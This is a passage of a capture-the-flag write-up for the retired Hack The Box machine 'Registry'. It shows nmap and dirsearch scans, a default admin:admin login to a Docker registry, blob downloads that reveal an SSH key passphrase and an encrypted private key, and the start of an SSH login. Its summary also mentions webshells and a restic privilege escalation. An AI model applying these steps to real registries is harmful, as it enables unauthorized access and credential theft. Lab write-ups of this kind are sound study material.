
Quick Summary
   → My very first Hard box is now retired. A machine where you can exploit if you know what the technology is used. The initial scan has give me a big hint that this machine is using Docker and 3rd party server named REGISTRY Server.
   And in the server there’s a lot container which I downloaded and find an SSH Key to get in to the machine and get the user.txt.
   On my Privilege Escalation to the box’ I found out that I need to do lateral movement to the www-data shell which basically the webserver. From that, user can abuse SUDOERS rights by running the Restic and create a backup for root directory to my Kali Linux machine and get the shell and root.txt.
Penetration Testing Methodologies
- Network Scanning - → Nmap scan - → discover open ports and what services are running 
- Enumeration - → Browsing the HTTP Service - → put the - commonNamein- /etc/hosts/file that appear on the Nmap Scan
 - → Download and analyze the - install file
 - → Visit the - docker.registry.htband Look for interesting stuff in a Docker API
 
- Post - Exploitation - → Enumerating the Docker API by following this method - → Found the docker repository that contains image called bolt-image - → Found the some blobs file from - latest
 - → Download all the blob files and try to look for a password or ssh key - → Get in to the Registry machine 
- Exploitation - → Enumerate the Bolt CMS Website - → using LinPEAS i found a hash that I can use for password of the website - → Looking at configuration I modify the - config.ymland upload 2 webshells as fast as I can to gain- www-datashell.
 
- Privilege Escalation - → Abuse what - www-dataallowed to run which is the restic
 - → create snapshot on my Kali linux machine which will be the backup server for restic - → do reverse SSH in - bolt user shell
 - → run the restic on - www-dataand backup the root directory that will transfer into my machine.
 - → get the - id_rsakey on ssh folder, and login as root.
 - → Finally rooted and got the root.txt 
Network Scanning
Walkthrough
→ First, I run the NMAP to scan the target and get information about the various services that are running on the target machine. I use
- -sV      ⇒ Probe open ports to determine service/version info
- -sC      ⇒ equivalent to —script=default
- -T 0-5   ⇒ Set timing template - higher is faster (less accurate)
- -p-      ⇒ Scan all 65535 ports
- -oN      ⇒ to save our scan results to a text file
| # bash
 nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
 
 
 | 
| # bash
 root in htb/boxes/Registry
 ❯ nmap -sV -sC -p- -T4 10.10.10.159 -oN nmap-Registry
 Starting Nmap 7.80 ( https:
 Warning: 10.10.10.159 giving up on port because retransmission cap hit (6).
 Nmap scan report for 10.10.10.159
 Host is up (0.25s latency).
 Not shown: 65458 closed ports, 74 filtered ports
 PORT    STATE SERVICE  VERSION
 22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
 | ssh-hostkey:
 |   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
 |   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
 |_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
 80/tcp  open  http     nginx 1.14.0 (Ubuntu)
 |_http-server-header: nginx/1.14.0 (Ubuntu)
 |_http-title: Welcome to nginx!
 443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
 |_http-server-header: nginx/1.14.0 (Ubuntu)
 |_http-title: Welcome to nginx!
 | ssl-cert: Subject: commonName=docker.registry.htb
 | Not valid before: 2019-05-06T21:14:35
 |_Not valid after:  2029-05-03T21:14:35
 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
 Service detection performed. Please report any incorrect results at https:
 Nmap done: 1 IP address (1 host up) scanned in 1218.67 seconds
 
 root in htb/boxes/Registry took 20m19s
 ❯
 
 
 | 
Nmap results
So there’s port open.
- 22      ⇒ which basically use for SSH Connections
- 80       ⇒ which basically running HTTP Service
- 443	   ⇒ which running also HTTP/S and have ssl-cert – commonName=docker.registry.htb, I added that on my hosts file.
Enumeration
So I always visit first the HTTP service because that is a website and I got default page of a Nginx Server.

There’s no hint for that so i try enumerate the website using dirsearch Web path scanner to look for website page or items which can give me a hints.
Bruteforce Web directories
| 
 root in htb/boxes/Registry
 ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.159/" -e asd -t 20 --simple-report=registry-directories
 
 _|. _ _  _  _  _ _|_    v0.3.9
 (_||| _) (/_(_|| (_| )
 
 Extensions: asd | HTTP method: get | Threads: 20 | Wordlist size: 6109
 
 Error Log: /opt/dirsearch/logs/errors-20-04-04_07-13-49.log
 
 Target: http://10.10.10.159/
 
 [07:13:49] Starting:
 [07:13:51] 400 -  182B  - /%2e%2e/google.com
 [07:13:51] 403 -  580B  - /.bash_history
 [07:13:53] 403 -  580B  - /.ht_wsr.txt
 [07:13:53] 403 -  580B  - /.hta
 [07:13:53] 403 -  580B  - /.htaccess-dev
 [07:13:53] 403 -  580B  - /.htaccess-local
 [07:13:53] 403 -  580B  - /.htaccess-marco
 [07:13:53] 403 -  580B  - /.htaccess.BAK
 [07:13:53] 403 -  580B  - /.htaccess.bak1
 [07:13:53] 403 -  580B  - /.htaccess.old
 [07:13:53] 403 -  580B  - /.htaccess.orig
 [07:13:53] 403 -  580B  - /.htaccess.sample
 [07:13:53] 403 -  580B  - /.htaccess.txt
 [07:13:53] 403 -  580B  - /.htaccess.save
 [07:13:53] 403 -  580B  - /.htaccess_extra
 [07:13:53] 403 -  580B  - /.htaccess_orig
 [07:13:53] 403 -  580B  - /.htaccess_sc
 [07:13:53] 403 -  580B  - /.htaccessBAK
 [07:13:53] 403 -  580B  - /.htaccessOLD
 [07:13:53] 403 -  580B  - /.htaccessOLD2
 [07:13:53] 403 -  580B  - /.htaccess~
 [07:13:53] 403 -  580B  - /.htgroup
 [07:13:53] 403 -  580B  - /.htpasswd-old
 [07:13:53] 403 -  580B  - /.htpasswd_test
 [07:13:53] 403 -  580B  - /.htpasswds
 [07:13:53] 403 -  580B  - /.htusers
 [07:14:05] 403 -  580B  - /admin/.htaccess
 [07:14:13] 403 -  580B  - /administrator/.htaccess
 [07:14:17] 403 -  580B  - /app/.htaccess
 [07:14:44] 200 -  612B  - /index.html
 [07:14:45] 301 -  194B  - /install  ->  http://10.10.10.159/install/
 [07:14:45] 200 -    1KB - /install/
 
 Task Completed
 
 root in htb/boxes/Registry took 2m4s
 ❯
 
 
 | 
Get install file
I only got one which is the install when I added it into the URL it is 404 Page Not found.

but I manage to download the install using wget
| # bash
 root in htb/boxes/Registry
 ❯ wget http:
 --2020-04-04 07:27:30--  http:
 Connecting to 10.10.10.159:80... connected.
 HTTP request sent, awaiting response... 301 Moved Permanently
 Location: http:
 --2020-04-04 07:27:30--  http:
 Reusing existing connection to 10.10.10.159:80.
 HTTP request sent, awaiting response... 200 OK
 Length: unspecified [text/html]
 Saving to: ‘install’
 
 install                                            [ <=>                                                                                                ]   1.03K  --.-KB/s    in 0s
 
 2020-04-04 07:27:31 (81.5 MB/s) - ‘install’ saved [1050]
 
 
 root in htb/boxes/Registry
 ❯
 
 
 | 
So I thought this was only ordinary a text file but it’s not, is a gzip file so I tried to move into a gzip and decompressed but it’s not working, and I don’t whats wrong so I move on and go the the next phase.
| 
 root in htb/boxes/Registry
 ❯ file install
 install: gzip compressed data, last modified: Mon Jul 29 23:38:20 2019, from Unix, original size modulo 2^32 167772200 gzip compressed data, reserved method, has CRC, was "", from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 167772200
 
 
 | 

Explore Docker Registry
Next, i visited the docker.registry.htb and there will be a popup login requesting for username and password, I input admin:admin on that and it’s displaying a JSON API page.

and the JSON API

Post - Exploitation
Next, I search for Docker api registry exploitation and I didn’t failed. I found this awesome article which help me to get a password for SSH Key by exploring each blobs file.
So based on the method of the article, I look first at the /v2/_catalog and there’s a docker repository called "bolt-image" and it is basically a collection of related images.
Diving the Docker Repository

Next I added /tags/list and there was repository install called latest

trying to look at the /manifest/v2

To download the file latest I added simply this in the url /manifest/latest.

Open this file and we will see a lot of blobSum does have the latest repository in a Docker registry. Each of them will contains some info like password, files, ssh key etc.
Here are some blobs from latest.
| 
 root in htb/boxes/Registry
 ❯ cat latest
 
 {
 "schemaVersion": 1,
 "name": "bolt-image",
 "tag": "latest",
 "architecture": "amd64",
 "fsLayers": [
 {
 "blobSum": "sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b"
 },
 {
 "blobSum": "sha256:3f12770883a63c833eab7652242d55a95aea6e2ecd09e21c29d7d7b354f3d4ee"
 },
 {
 "blobSum": "sha256:02666a14e1b55276ecb9812747cb1a95b78056f1d202b087d71096ca0b58c98c"
 },
 {
 "blobSum": "sha256:c71b0b975ab8204bb66f2b659fa3d568f2d164a620159fc9f9f185d958c352a7"
 },
 {
 "blobSum": "sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791"
 },
 {
 "blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
 },
 {
 "blobSum": "sha256:f5029279ec1223b70f2cbb2682ab360e1837a2ea59a8d7ff64b38e9eab5fb8c0"
 },
 {
 "blobSum": "sha256:d9af21273955749bb8250c7a883fcce21647b54f5a685d237bc6b920a2ebad1a"
 },
 {
 "blobSum": "sha256:8882c27f669ef315fc231f272965cd5ee8507c0f376855d6f9c012aae0224797"
 },
 {
 "blobSum": "sha256:f476d66f540886e2bb4d9c8cc8c0f8915bca7d387e536957796ea6c2f8e7dfff"
 }
 ],
 "history": [
 {
 "v1Compatibility": "{\"architecture\":\"amd64\",\"config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"container\":\"e2e88012228993b25b697ee37a0aae0cb0ecef7b1536d2b8e488a6ec3f353f14\",\"container_config\":{\"Hostname\":\"e2e880122289\",\"Domainname\":\"\",\"User\":\"\",\"AttachStdin\":true,\"AttachStdout\":true,\"AttachStderr\":true,\"Tty\":true,\"OpenStdin\":true,\"StdinOnce\":true,\"Env\":[\"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin\"],\"Cmd\":[\"bash\"],\"Image\":\"docker.registry.htb/bolt-image\",\"Volumes\":null,\"WorkingDir\":\"\",\"Entrypoint\":null,\"OnBuild\":null,\"Labels\":{}},\"created\":\"2019-05-25T15:18:56.9530238Z\",\"docker_version\":\"18.09.2\",\"id\":\"f18c41121574af38e7d88d4f5d7ea9d064beaadd500d13d33e8c419d01aa5ed5\",\"os\":\"linux\",\"parent\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\"}"
 },
 {
 "v1Compatibility": "{\"id\":\"9380d9cebb5bc76f02081749a8e795faa5b5cb638bf5301a1854048ff6f8e67e\",\"parent\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"created\":\"2019-05-25T15:13:31.3975799Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"d931b2ca04fc8c77c7cbdce00f9a79b1954e3509af20561bbb8896916ddd1c34\",\"parent\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"created\":\"2019-05-25T14:57:27.6745842Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"489e49942f587534c658da9060cbfc0cdb999865368926fab28ccc7a7575283a\",\"parent\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"created\":\"2019-05-25T14:47:52.6859489Z\",\"container_config\":{\"Cmd\":[\"bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"7f0ab92fdf7dd172ef58247894413e86cfc60564919912343c9b2e91cd788ae4\",\"parent\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"created\":\"2019-05-24T22:51:14.8744838Z\",\"container_config\":{\"Cmd\":[\"/bin/bash\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"5f7e711dba574b5edd0824a9628f3b91bfd20565a5630bbd70f358f0fc4ebe95\",\"parent\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"created\":\"2019-04-26T22:21:05.100534088Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop)  CMD [\\\"/bin/bash\\\"]\"]},\"throwaway\":true}"
 },
 {
 "v1Compatibility": "{\"id\":\"f75463b468b510b7850cd69053a002a6f10126be3764b570c5f80a7e5044974c\",\"parent\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"created\":\"2019-04-26T22:21:04.936777709Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c mkdir -p /run/systemd \\u0026\\u0026 echo 'docker' \\u003e /run/systemd/container\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"4b937c36cc17955293cc01d8c7c050c525d22764fa781f39e51afbd17e3e5529\",\"parent\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"created\":\"2019-04-26T22:21:04.220422684Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c rm -rf /var/lib/apt/lists/*\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"ab4357bfcbef1a7eaa70cfaa618a0b4188cccafa53f18c1adeaa7d77f5e57939\",\"parent\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:03.471632173Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c set -xe \\t\\t\\u0026\\u0026 echo '#!/bin/sh' \\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 echo 'exit 101' \\u003e\\u003e /usr/sbin/policy-rc.d \\t\\u0026\\u0026 chmod +x /usr/sbin/policy-rc.d \\t\\t\\u0026\\u0026 dpkg-divert --local --rename --add /sbin/initctl \\t\\u0026\\u0026 cp -a /usr/sbin/policy-rc.d /sbin/initctl \\t\\u0026\\u0026 sed -i 's/^exit.*/exit 0/' /sbin/initctl \\t\\t\\u0026\\u0026 echo 'force-unsafe-io' \\u003e /etc/dpkg/dpkg.cfg.d/docker-apt-speedup \\t\\t\\u0026\\u0026 echo 'DPkg::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'APT::Update::Post-Invoke { \\\"rm -f /var/cache/apt/archives/*.deb /var/cache/apt/archives/partial/*.deb /var/cache/apt/*.bin || true\\\"; };' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\u0026\\u0026 echo 'Dir::Cache::pkgcache \\\"\\\"; Dir::Cache::srcpkgcache \\\"\\\";' \\u003e\\u003e /etc/apt/apt.conf.d/docker-clean \\t\\t\\u0026\\u0026 echo 'Acquire::Languages \\\"none\\\";' \\u003e /etc/apt/apt.conf.d/docker-no-languages \\t\\t\\u0026\\u0026 echo 'Acquire::GzipIndexes \\\"true\\\"; Acquire::CompressionTypes::Order:: \\\"gz\\\";' \\u003e /etc/apt/apt.conf.d/docker-gzip-indexes \\t\\t\\u0026\\u0026 echo 'Apt::AutoRemove::SuggestsImportant \\\"false\\\";' \\u003e /etc/apt/apt.conf.d/docker-autoremove-suggests\"]}}"
 },
 {
 "v1Compatibility": "{\"id\":\"f4a833e38a779e09219325dfef9e5063c291a325cad7141bcdb4798ed68c675c\",\"created\":\"2019-04-26T22:21:02.724843678Z\",\"container_config\":{\"Cmd\":[\"/bin/sh -c #(nop) ADD file:7ce84f13f11609a50ece7823578159412e2299c812746d1d1f1ed5db0728bd37 in / \"]}}"
 }
 ],
 "signatures": [
 {
 "header": {
 "jwk": {
 "crv": "P-256",
 "kid": "VUEK:AQ5E:PKKZ:YK3J:YU44:72EU:GB57:BMI2:QMIK:DZEH:73WL:Q7BY",
 "kty": "EC",
 "x": "yS0jBSmoO13WXoTRXRcp_OsqPZ3-ttTv3biBxexcyCo",
 "y": "JpwUWLV6IwW720h8XgeRpCvPoeZ_f8I82qIprZvEgm4"
 },
 "alg": "ES256"
 },
 "signature": "9E2loVJqpUIUj3EnEIrSKzOWaHvHKEsdAgcPX8sr152QKzWw3J7SgwLOnXPaJWegHyjYjTDnsNyEauNF8_J2SA",
 "protected": "eyJmb3JtYXRMZW5ndGgiOjY3OTIsImZvcm1hdFRhaWwiOiJDbjAiLCJ0aW1lIjoiMjAyMC0wNC0wNFQwMDoyNzo1MVoifQ"
 }
 ]
 }
 
 
 | 
Exploring the blobSums
So I need to explore each blobSum, i will download each using wget and look for interesting stuffs. so:
| # bash
 root in htb/boxes/Registry
 ❯ wget --no-check-certificate --http-user=admin --http-password=admin https:
 --2020-04-04 08:38:15--  https:
 Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
 WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
 WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
 HTTP request sent, awaiting response... 401 Unauthorized
 Authentication selected: Basic realm="Registry"
 Reusing existing connection to docker.registry.htb:443.
 HTTP request sent, awaiting response... 200 OK
 Length: 335 [application/octet-stream]
 Saving to: ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’
 
 sha256:302bfcb3f10c386a25a58913917257bd2fe7721 100%[===================================================================================================>]     335  --.-KB/s    in 0s
 
 2020-04-04 08:38:16 (250 MB/s) - ‘sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b’ saved [335/335]
 
 
 root in htb/boxes/Registry
 ❯ ls
 install  install.gz  latest  nmap-Registry  registry-directories  sha256:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
 
 
 | 
Then i will moved it to into .gz file and decompressed it.
| 
 
 root in htb/boxes/Registry
 ❯ mv sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
 
 
 root in htb/boxes/Registry
 ❯ gunzip sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b.gz
 
 
 | 
Finally i can now read whats is on the first blob.
| 
 root in htb/boxes/Registry
 ❯ cat sha256\:302bfcb3f10c386a25a58913917257bd2fe772127e36645192fa35e4c6b3c66b
 etc/0040755000000000000000000000000013472256035010032 5ustar0000000000000000etc/profile.d/0040755000000000000000000000000013472256264011720 5ustar0000000000000000etc/profile.d/01-ssh.sh0100755000000000000000000000033613472067523013267 0ustar0000000000000000#!/usr/bin/expect -f
 
 spawn ssh-add /root/.ssh/id_rsa
 expect "Enter passphrase for /root/.ssh/id_rsa:"
 send "GkOcz221Ftb3ugog\n";
 expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
 interact
 etc/profile.d/.wh.02-ssh.sh0000600000000000000000000000000013472256232013730 0ustar0000000000000000
 root in htb/boxes/Registry
 ❯
 
 
 | 
Base on the first blob i download it looks like the "GkOcz221Ftb3ugog" is a password for SSH Key but I don’t have the id_rsa which is needed as from this line.
| 
 expect "Identity added: /root/.ssh/id_rsa (/root/.ssh/id_rsa)"
 
 
 | 
Hunting the Private key
So i need more blobSum to get the id_rsa key, the 2nd blob was empty. and thid blob looks interesting this one is 100 mb total of files so:
| 
 root in boxes/Registry/docker
 ❯ wget --no-check-certificate --http-user=admin --http-password=admin https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
 --2020-04-04 09:03:19--  https://docker.registry.htb/v2/bolt-image/blobs/sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791
 Resolving docker.registry.htb (docker.registry.htb)... 10.10.10.159
 Connecting to docker.registry.htb (docker.registry.htb)|10.10.10.159|:443... connected.
 WARNING: The certificate of ‘docker.registry.htb’ is not trusted.
 WARNING: The certificate of ‘docker.registry.htb’ doesn't have a known issuer.
 HTTP request sent, awaiting response... 401 Unauthorized
 Authentication selected: Basic realm="Registry"
 Reusing existing connection to docker.registry.htb:443.
 HTTP request sent, awaiting response... 200 OK
 Length: 104569678 (100M) [application/octet-stream]
 Saving to: ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’
 
 sha256:2931a8b44e495489fdbe2bccd7232e99b182034 100%[===================================================================================================>]  99.72M   752KB/s    in 2m 56s
 
 2020-04-04 09:06:16 (580 KB/s) - ‘sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791’ saved [104569678/104569678]
 
 
 root in boxes/Registry/docker took 2m57s
 ❯
 
 
 | 
Get in into the REGISTRY
after the download finished I explore the /root directory which contains the .ssh directory which has id_rsa and config file.

I look first at the config file and the user for SSH is bolt
| 
 Host registry
 User bolt
 Port 22
 Hostname registry.htb
 
 root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh
 
 
 | 
and the RSA Key
| 
 root in boxes/Registry/docker
 ❯ cat id_rsa
 -----BEGIN RSA PRIVATE KEY-----
 Proc-Type: 4,ENCRYPTED
 DEK-Info: AES-128-CBC,1C98FA248505F287CCC597A59CF83AB9
 
 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
 Bdtfi9goJBFb6P7yHapZ13W30b96ZQG4Gdf4ZeV6MPMizcTbiggZRBokZLCBMb5H
 pgkPgTrGJlbm+sLu/kt4jgex3T/NWwXHVrny5kIuTbbv1fXfyfkPqU66eysstO2s
 OxciNk4W41o9YqHHYM9D/uL6xMqO3K/LTYUI+LcCK13pkjP7/zH+bqiClfNt0D2B
 Xg6OWYK7E/DTqX+7zqNQp726sDAYKqQNpwgHldyDhOG3i8o66mLj3xODHQzBvwKR
 bJ7jrLPW+AmQwo/V8ElNFPyP6oZBEdoNVn/plMDAi0ZzBHJc7hJ0JuHnMggWFXBM
 PjxG/w4c8XV/Y2WavafEjT7hHuviSo6phoED5Zb3Iu+BU+qoEaNM/LntDwBXNEVu
 Z0pIXd5Q2EloUZDXoeyMCqO/NkcIFkx+//BDddVTFmfw21v2Y8fZ2rivF/8CeXXZ
 ot6kFb4G6gcxGpqSZKY7IHSp49I4kFsC7+tx7LU5/wqC9vZfuds/TM7Z+uECPOYI
 f41H5YN+V14S5rU97re2w49vrBxM67K+x930niGVHnqk7t/T1jcErROrhMeT6go9
 RLI9xScv6aJan6xHS+nWgxpPA7YNo2rknk/ZeUnWXSTLYyrC43dyPS4FvG8N0H1V
 94Vcvj5Kmzv0FxwVu4epWNkLTZCJPBszTKiaEWWS+OLDh7lrcmm+GP54MsLBWVpr
 -----END RSA PRIVATE KEY-----
 
 root in sha256:2931a8b44e495489fdbe2bccd7232e99b182034206067a364553841a1f06f791 (1)/root/.ssh
 ❯
 
 
 | 
I move the the id_rsa in my registry directory and do the SSH Login so:
| 
 root in htb/boxes/Registry
 ❯ ssh -v -i id_rsa bolt@registry.htb
 OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d  10 Sep 2019
 debug1: Reading configuration data /etc/ssh/ssh_config
 debug1: /etc/ssh/ssh_config line 19: Applying options for *
 debug1: Connecting to registry.htb [10.10.10.159] port 22.
 debug1: Connection established.
 debug1: identity file id_rsa type 0
 debug1: identity file id_rsa-cert type -1
 debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
 debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
 debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
 debug1: Authenticating to registry.htb:22 as 'bolt'
 debug1: SSH2_MSG_KEXINIT sent
 debug1: SSH2_MSG_KEXINIT received
 debug1: kex: algorithm: curve25519-sha256
 debug1: kex: host key algorithm: ecdsa-sha2-nistp256
 debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
 debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
 debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
 debug1: Server host key: ecdsa-sha2-nistp256 SHA256:G1J5ek/T6KuCCT7Xp2IN1LUslRt24mhmhKUo/kWWVrs
 debug1: Host 'registry.htb' is known and matches the ECDSA host key.
 debug1: Found key in /root/.ssh/known_hosts:5
 debug1: rekey out after 134217728 blocks
 debug1: SSH2_MSG_NEWKEYS sent
 debug1: expecting SSH2_MSG_NEWKEYS
 debug1: SSH2_MSG_NEWKEYS received
 debug1: rekey in after 134217728 blocks
